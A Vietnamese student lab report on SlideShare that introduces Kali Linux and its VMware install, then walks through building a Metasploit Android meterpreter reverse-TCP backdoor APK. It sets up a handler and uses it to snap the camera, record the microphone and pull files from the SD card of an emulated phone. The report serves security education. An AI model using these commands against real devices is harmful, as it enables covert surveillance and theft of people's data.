SlideShare a Scribd company logo

Báo cáo đề tài 5

Download as DOCX, PDF
Nguyen Anh
Nguyen Anh
1 of 22
Nguyễn Hoàng Anh – lớp CNTT – ca sáng 2-4-6 Báo cáo đề tài 5: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài. Nghiên cứu Kali Linux, các cơ chế tạo mã độ trên Kali Linux để xâm nhập thẻ sd card, camera, ghi âm trên android Truyền dữ liệu trên thẻ sd card, kích hoạt camera, ghi âm trên android I. Kali-Linux Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến: Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt
cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa II. Cài đặt Kali Linux trên máy ảo VMware Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/ Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next
Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó: Đặt tên và đặt đường dẫn cho máy ảo
Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường...
Tiếp theo chọn Root password, luôn nhớ Root password đã chọn! Phần Partition chọn Guided – use entire disk và All files in one partition
Chọn Finish partitioning and write changes to disk Chọn Yes
Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và password đã đặt ở phần trước. Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
III. Tạo mã độc trên Kali Linux để xâm nhập Android Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network
Bấm vào Edit -> Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk 192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng (well knowm port : 0 -> 1023). Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor. Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload /meterpreter/reverse_tcp set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. set port 8080 – nhập port giống với port khi tạo payload ở trên. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp:
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Để xem thông tin về máy, nhập lệnh SysInfo Sử dụng camera: Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau: File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy
Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk Và file này sẽ được tải về thư mục root của máy Kali
Ngoài ra, để xem danh sách các lệnh, gõ help. IV. Tổng kết Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy android về máy. Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn quyền kiểm soát máy android đó.

Recommended

BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENAXuân Ngọc Nguyễn
 
Tuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxTuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxHường Tô
 
Bao cao athena 2
Bao cao athena 2Bao cao athena 2
Bao cao athena 2NhoxPO
 
Tuan 3
Tuan 3Tuan 3
Tuan 3Hữu Mỹ Lê Phan
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidVũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vpsChuc Thanh
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thanglaonap166
 

Recommended

BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENAXuân Ngọc Nguyễn
 
Tuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxTuần 1+2 cài đặt kali linux
Tuần 1+2 cài đặt kali linuxHường Tô
 
Bao cao athena 2
Bao cao athena 2Bao cao athena 2
Bao cao athena 2NhoxPO
 
Tuan 3
Tuan 3Tuan 3
Tuan 3Hữu Mỹ Lê Phan
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidVũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vpsChuc Thanh
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thanglaonap166
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vpsHường Tô
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
BaocaocuoikiVương Nguyễn
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
Chuong 1 gt linux
Chuong 1 gt linuxChuong 1 gt linux
Chuong 1 gt linuxThiên Thần Máy Tính
 
Linux+01
Linux+01Linux+01
Linux+01Duong Hieu
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaHoàng Phúc Phạm
 
Linux LPI Bacis
Linux LPI BacisLinux LPI Bacis
Linux LPI BacisTuan Nguyen
 
Linux+03
Linux+03Linux+03
Linux+03Duong Hieu
 
1
11
1Chuc Thanh
 
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Văn Nguyễn Trung
 
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012laonap166
 
Lesson 7 - Linux Shell Programming
Lesson 7 - Linux Shell ProgrammingLesson 7 - Linux Shell Programming
Lesson 7 - Linux Shell ProgrammingThang Man
 
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp
 
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tậpHướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tậpKinh Duong Quang
 
Cài đặt android ảo
Cài đặt android ảoCài đặt android ảo
Cài đặt android ảoNguyen Stone
 
Huong dan tao may ao bang virtual box
Huong dan tao may ao bang virtual boxHuong dan tao may ao bang virtual box
Huong dan tao may ao bang virtual boxKinh Duong Quang
 
Lập trình trên di động với j2 me
Lập trình trên di động với j2 meLập trình trên di động với j2 me
Lập trình trên di động với j2 meKinh Duong Quang
 
Webmining[final]
Webmining[final]Webmining[final]
Webmining[final]Hari Hari
 

More Related Content

What's hot

Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vpsHường Tô
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaHoàng Phúc Phạm
 
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Văn Nguyễn Trung
 
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012laonap166
 
Lesson 7 - Linux Shell Programming
Lesson 7 - Linux Shell ProgrammingLesson 7 - Linux Shell Programming
Lesson 7 - Linux Shell ProgrammingThang Man
 

What's hot (16)

Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
Chuong 1 gt linux
Chuong 1 gt linuxChuong 1 gt linux
Chuong 1 gt linux
 
Linux+01
Linux+01Linux+01
Linux+01
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
 
Linux LPI Bacis
Linux LPI BacisLinux LPI Bacis
Linux LPI Bacis
 
Linux+03
Linux+03Linux+03
Linux+03
 
1
11
1
 
Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)Huong dan su dung svn server (SVN subversion - SVN Hosting)
Huong dan su dung svn server (SVN subversion - SVN Hosting)
 
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
 
Lesson 7 - Linux Shell Programming
Lesson 7 - Linux Shell ProgrammingLesson 7 - Linux Shell Programming
Lesson 7 - Linux Shell Programming
 

Viewers also liked

Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp
 
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tậpHướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tậpKinh Duong Quang
 
Cài đặt android ảo
Cài đặt android ảoCài đặt android ảo
Cài đặt android ảoNguyen Stone
 
Huong dan tao may ao bang virtual box
Huong dan tao may ao bang virtual boxHuong dan tao may ao bang virtual box
Huong dan tao may ao bang virtual boxKinh Duong Quang
 
Lập trình trên di động với j2 me
Lập trình trên di động với j2 meLập trình trên di động với j2 me
Lập trình trên di động với j2 meKinh Duong Quang
 
Webmining[final]
Webmining[final]Webmining[final]
Webmining[final]Hari Hari
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nguyen Anh
 
Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...
Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...
Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...MasterCode.vn
 
Lập trình hướng đối tượng với Java - Trần Đình Quế
Lập trình hướng đối tượng với Java - Trần Đình QuếLập trình hướng đối tượng với Java - Trần Đình Quế
Lập trình hướng đối tượng với Java - Trần Đình Quếf3vthd
 

Viewers also liked (11)

Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
 
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tậpHướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
Hướng dẫn cài đặt hệ điều hành mac trên pc toàn tập
 
Cài đặt android ảo
Cài đặt android ảoCài đặt android ảo
Cài đặt android ảo
 
Huong dan tao may ao bang virtual box
Huong dan tao may ao bang virtual boxHuong dan tao may ao bang virtual box
Huong dan tao may ao bang virtual box
 
Lập trình trên di động với j2 me
Lập trình trên di động với j2 meLập trình trên di động với j2 me
Lập trình trên di động với j2 me
 
Webmining[final]
Webmining[final]Webmining[final]
Webmining[final]
 
Exercises 1 2
Exercises 1 2Exercises 1 2
Exercises 1 2
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
 
Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...
Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...
Bài 2: Lập trình hướng đối tượng & Collection - Lập trình winform - Giáo trìn...
 
Lập trình hướng đối tượng với Java - Trần Đình Quế
Lập trình hướng đối tượng với Java - Trần Đình QuếLập trình hướng đối tượng với Java - Trần Đình Quế
Lập trình hướng đối tượng với Java - Trần Đình Quế
 

Similar to Báo cáo đề tài 5

Tuần 3 tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxTuần 3 tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Chuc Thanh
 
Cài đặt Genmymotion
Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt GenmymotionTrọng An
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyBao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyhoaihuysc
 
Sự khác nhau giữa phần mềm portable và installer
Sự khác nhau giữa phần mềm portable và installerSự khác nhau giữa phần mềm portable và installer
Sự khác nhau giữa phần mềm portable và installerĐạt Ngô
 
2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdfMinhNguyenthi11
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2Loc Loc
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnThái Tuấn Lưu
 

Similar to Báo cáo đề tài 5 (20)

Tuần 3 tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxTuần 3 tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Kali
KaliKali
Kali
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Athena tuần 1
Athena tuần 1Athena tuần 1
Athena tuần 1
 
Kali linux
Kali linuxKali linux
Kali linux
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Cài đặt Genmymotion
Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huyBao cao thuc tap nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Sự khác nhau giữa phần mềm portable và installer
Sự khác nhau giữa phần mềm portable và installerSự khác nhau giữa phần mềm portable và installer
Sự khác nhau giữa phần mềm portable và installer
 
2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf2. Getting Comfortable with Kali Linux.pdf
2. Getting Comfortable with Kali Linux.pdf
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
Bao cao
Bao caoBao cao
Bao cao
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 
Tuan 4
Tuan 4Tuan 4
Tuan 4
 

Báo cáo đề tài 5

  • 1. Nguyễn Hoàng Anh – lớp CNTT – ca sáng 2-4-6 Báo cáo đề tài 5: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài. Nghiên cứu Kali Linux, các cơ chế tạo mã độ trên Kali Linux để xâm nhập thẻ sd card, camera, ghi âm trên android Truyền dữ liệu trên thẻ sd card, kích hoạt camera, ghi âm trên android I. Kali-Linux Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến: Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá 